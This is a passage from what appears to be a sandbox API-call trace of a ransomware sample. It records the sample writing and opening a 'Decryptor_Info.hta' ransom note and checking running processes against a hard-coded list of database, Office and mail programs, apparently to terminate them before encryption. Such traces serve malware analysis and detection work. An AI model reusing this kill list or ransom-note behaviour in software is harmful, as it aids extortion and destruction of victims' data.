Flags=0x0, Size=0x6) returned 0x72b868 [0104.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b878 [0104.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x4) returned 0x72b888 [0104.922] GetLastError () returned 0x0 [0104.922] SetLastError (dwErrCode=0x0) [0104.922] GetLastError () returned 0x0 [0104.922] SetLastError (dwErrCode=0x0) [0104.922] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xb8) returned 0x708cb0 [0104.923] GetLastError () returned 0x0 [0104.923] SetLastError (dwErrCode=0x0) [0104.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6a6) returned 0x6ec200 [0104.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ec200 | out: hHeap=0x6d0000) returned 1 [0104.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b868 | out: hHeap=0x6d0000) returned 1 [0104.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9338 | out: hHeap=0x6d0000) returned 1 [0104.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b888 | out: hHeap=0x6d0000) returned 1 [0104.923] GetLastError () returned 0x0 [0104.923] SetLastError (dwErrCode=0x0) [0104.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b888 [0104.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b868 [0104.923] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x4) returned 0x72b898 [0104.923] GetLastError () returned 0x0 [0104.923] SetLastError (dwErrCode=0x0) [0104.923] GetLastError () returned 0x0 [0104.923] SetLastError (dwErrCode=0x0) [0104.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0xb8) returned 0x6e9338 [0104.924] GetLastError () returned 0x0 [0104.924] SetLastError (dwErrCode=0x0) [0104.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6a6) returned 0x6ec200 [0104.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ec200 | out: hHeap=0x6d0000) returned 1 [0104.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b888 | out: hHeap=0x6d0000) returned 1 [0104.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708cb0 | out: hHeap=0x6d0000) returned 1 [0104.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b898 | out: hHeap=0x6d0000) returned 1 [0104.924] GetLastError () returned 0x0 [0104.924] SetLastError (dwErrCode=0x0) [0104.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b898 [0104.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b868 | out: hHeap=0x6d0000) returned 1 [0104.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b878 | out: hHeap=0x6d0000) returned 1 [0104.924] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b878 [0104.925] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1000) returned 0x6ec200 [0104.925] GetLastError () returned 0x0 [0104.925] SetLastError (dwErrCode=0x0) [0104.925] WriteFile (in: hFile=0x104, lpBuffer=0x2ce84c*, nNumberOfBytesToWrite=0xd08, lpNumberOfBytesWritten=0x2ce844, lpOverlapped=0x0 | out: lpBuffer=0x2ce84c*, lpNumberOfBytesWritten=0x2ce844*=0xd08, lpOverlapped=0x0) returned 1 [0104.927] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ec200 | out: hHeap=0x6d0000) returned 1 [0104.927] CloseHandle (hObject=0x104) returned 1 [0104.929] ShellExecuteA (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0107.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b838 | out: hHeap=0x6d0000) returned 1 [0107.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0107.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708f20 | out: hHeap=0x6d0000) returned 1 [0107.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb578 | out: hHeap=0x6d0000) returned 1 [0107.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ec8 | out: hHeap=0x6d0000) returned 1 [0107.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7098d0 | out: hHeap=0x6d0000) returned 1 [0107.796] GetModuleHandleW (lpModuleName=0x0) returned 0xc40000 [0107.796] GetModuleHandleW (lpModuleName=0x0) returned 0xc40000 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8688 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ea8 | out: hHeap=0x6d0000) returned 1 [0107.797] CryptReleaseContext (hProv=0x709260, dwFlags=0x0) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e4a40 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e84f8 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709600 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7096a8 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8520 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709700 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b858 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b878 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709be8 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f48 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b848 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0107.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e85e8 | out: hHeap=0x6d0000) returned 1 [0107.798] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7098 | out: hHeap=0x6d0000) returned 1 [0107.798] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709058 | out: hHeap=0x6d0000) returned 1 [0107.798] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6890 | out: hHeap=0x6d0000) returned 1 [0107.799] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x2cfeb8 | out: phModule=0x2cfeb8) returned 0 [0107.817] ExitProcess (uExitCode=0x0) [0107.819] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e4af0 | out: hHeap=0x6d0000) returned 1 Thread: id = 124 os_tid = 0xc44 [0080.000] GetCurrentThread () returned 0xfffffffe [0080.000] WaitForSingleObject (hHandle=0xfffffffe, dwMilliseconds=0x64) returned 0x102 [0080.347] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0080.357] Process32FirstW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.358] lstrcmpiW (lpString1="[System Process]", lpString2="SearchIndexer.exesqlservr.exe") returned -1 [0080.358] lstrcmpiW (lpString1="[System Process]", lpString2="msftesql.exe") returned -1 [0080.358] lstrcmpiW (lpString1="[System Process]", lpString2="sqlagent.exe") returned -1 [0080.358] lstrcmpiW (lpString1="[System Process]", lpString2="sqlwriter.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="oracle.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="ocssd.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="dbsnmp.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="synctime.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="mydesktopqos.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="agntsvc.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="isqlpplussvc.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="isqlpussvc.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="xfssvccon.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="mydesktopservice.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="ocautoupds.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="encsvc.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="firefoxconfig.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="tbirdconfig.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="ocomm.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="mysqld.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="mysqld-nt") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="mysqld-opt") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="dbeng50.exe") returned -1 [0080.359] lstrcmpiW (lpString1="[System Process]", lpString2="sqbcoreservice.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="excel.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="infopath.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="msaccess.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="mspub.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="onenote.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="outlook.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="powerpnt.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="stream.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="thebat.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="thebat64.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="Thunderbird.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="visio.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="winword.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="wordpad.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="sqlwb.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="sqlbrowser.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="agntsvcagntsvc.exe") returned -1 [0080.360] lstrcmpiW (lpString1="[System Process]", lpString2="agntsvcencsvc.exe") returned -1 [0080.361] lstrcmpiW (lpString1="[System Process]", lpString2="agntsvcisqlplussvc.exe") returned -1 [0080.361] Process32NextW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="SearchIndexer.exesqlservr.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="msftesql.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="sqlagent.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="sqlwriter.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="oracle.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="ocssd.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="dbsnmp.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="synctime.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="mydesktopqos.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="agntsvc.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="isqlpplussvc.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="isqlpussvc.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="xfssvccon.exe") returned -1 [0080.362] lstrcmpiW (lpString1="System", lpString2="mydesktopservice.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="ocautoupds.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="encsvc.exe") returned 1 [0080.362] lstrcmpiW (lpString1="System", lpString2="firefoxconfig.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="tbirdconfig.exe") returned -1 [0080.363] lstrcmpiW (lpString1="System", lpString2="ocomm.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="mysqld.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="mysqld-nt") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="mysqld-opt") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="dbeng50.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="sqbcoreservice.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="excel.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="infopath.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="msaccess.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="mspub.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="onenote.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="outlook.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="powerpnt.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="stream.exe") returned 1 [0080.363] lstrcmpiW (lpString1="System", lpString2="thebat.exe") returned -1 [0080.363] lstrcmpiW (lpString1="System", lpString2="thebat64.exe") returned -1 [0080.363] lstrcmpiW (lpString1="System", lpString2="Thunderbird.exe") returned -1 [0080.364] lstrcmpiW (lpString1="System", lpString2="visio.exe") returned -1 [0080.364] lstrcmpiW (lpString1="System", lpString2="winword.exe") returned -1 [0080.364] lstrcmpiW (lpString1="System", lpString2="wordpad.exe") returned -1 [0080.364] lstrcmpiW (lpString1="System", lpString2="sqlwb.exe") returned 1 [0080.364] lstrcmpiW (lpString1="System", lpString2="sqlbrowser.exe") returned 1 [0080.364] lstrcmpiW (lpString1="System", lpString2="agntsvcagntsvc.exe") returned 1 [0080.364] lstrcmpiW (lpString1="System", lpString2="agntsvcencsvc.exe") returned 1 [0080.364] lstrcmpiW (lpString1="System", lpString2="agntsvcisqlplussvc.exe") returned 1 [0080.364] Process32NextW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0080.365] lstrcmpiW (lpString1="smss.exe", lpString2="SearchIndexer.exesqlservr.exe") returned 1 [0080.365] lstrcmpiW (lpString1="smss.exe", lpString2="msftesql.exe") returned 1 [0080.365] lstrcmpiW (lpString1="smss.exe", lpString2="sqlagent.exe") returned -1 [0080.365] lstrcmpiW (lpString1="smss.exe", lpString2="sqlwriter.exe") returned -1 [0080.365] lstrcmpiW (lpString1="smss.exe", lpString2="oracle.exe") returned 1 [0080.365] lstrcmpiW (lpString1="smss.exe", lpString2="ocssd.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="dbsnmp.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="synctime.exe") returned -1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="mydesktopqos.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="agntsvc.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="isqlpplussvc.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="isqlpussvc.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="xfssvccon.exe") returned -1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="mydesktopservice.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="ocautoupds.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="encsvc.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="firefoxconfig.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="tbirdconfig.exe") returned -1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="ocomm.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="mysqld.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="mysqld-nt") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="mysqld-opt") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="dbeng50.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="sqbcoreservice.exe") returned -1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="excel.exe") returned 1 [0080.366] lstrcmpiW (lpString1="smss.exe", lpString2="infopath.exe") returned 1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="msaccess.exe") returned 1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="mspub.exe") returned 1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="onenote.exe") returned 1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="outlook.exe") returned 1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="powerpnt.exe") returned 1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="stream.exe") returned -1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="thebat.exe") returned -1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="thebat64.exe") returned -1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="Thunderbird.exe") returned -1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="visio.exe") returned -1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="winword.exe") returned -1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="wordpad.exe") returned -1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="sqlwb.exe") returned -1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="sqlbrowser.exe") returned -1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="agntsvcagntsvc.exe") returned 1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="agntsvcencsvc.exe") returned 1 [0080.367] lstrcmpiW (lpString1="smss.exe", lpString2="agntsvcisqlplussvc.exe") returned 1 [0080.367] Process32NextW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="SearchIndexer.exesqlservr.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="msftesql.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlagent.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlwriter.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="oracle.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="ocssd.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="dbsnmp.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="synctime.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="mydesktopqos.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="agntsvc.exe") returned 1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="isqlpplussvc.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="isqlpussvc.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="xfssvccon.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="mydesktopservice.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="ocautoupds.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="encsvc.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="firefoxconfig.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="tbirdconfig.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="ocomm.exe") returned -1 [0080.369] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld-nt") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld-opt") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="dbeng50.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="sqbcoreservice.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="excel.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="infopath.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="msaccess.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="mspub.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="onenote.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="outlook.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="powerpnt.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="stream.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="thebat.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="thebat64.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="Thunderbird.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="visio.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="winword.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="wordpad.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlwb.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlbrowser.exe") returned -1 [0080.370] lstrcmpiW (lpString1="csrss.exe", lpString2="agntsvcagntsvc.exe") returned 1 [0080.371] lstrcmpiW (lpString1="csrss.exe", lpString2="agntsvcencsvc.exe") returned 1 [0080.371] lstrcmpiW (lpString1="csrss.exe", lpString2="agntsvcisqlplussvc.exe") returned 1 [0080.371] Process32NextW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="SearchIndexer.exesqlservr.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="msftesql.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlagent.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlwriter.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="oracle.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="ocssd.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="dbsnmp.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="synctime.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="mydesktopqos.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="agntsvc.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="isqlpplussvc.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="isqlpussvc.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="xfssvccon.exe") returned -1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="mydesktopservice.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="ocautoupds.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="encsvc.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="firefoxconfig.exe") returned 1 [0080.372] lstrcmpiW (lpString1="wininit.exe", lpString2="tbirdconfig.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="ocomm.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="mysqld.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="mysqld-nt") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="mysqld-opt") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="dbeng50.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="sqbcoreservice.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="excel.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="infopath.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="msaccess.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="mspub.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="onenote.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="outlook.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="powerpnt.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="stream.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="thebat.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="thebat64.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="Thunderbird.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="visio.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="winword.exe") returned -1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="wordpad.exe") returned -1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlwb.exe") returned 1 [0080.373] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlbrowser.exe") returned 1 [0080.374] lstrcmpiW (lpString1="wininit.exe", lpString2="agntsvcagntsvc.exe") returned 1 [0080.374] lstrcmpiW (lpString1="wininit.exe", lpString2="agntsvcencsvc.exe") returned 1 [0080.374] lstrcmpiW (lpString1="wininit.exe", lpString2="agntsvcisqlplussvc.exe") returned 1 [0080.374] Process32NextW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="SearchIndexer.exesqlservr.exe") returned -1 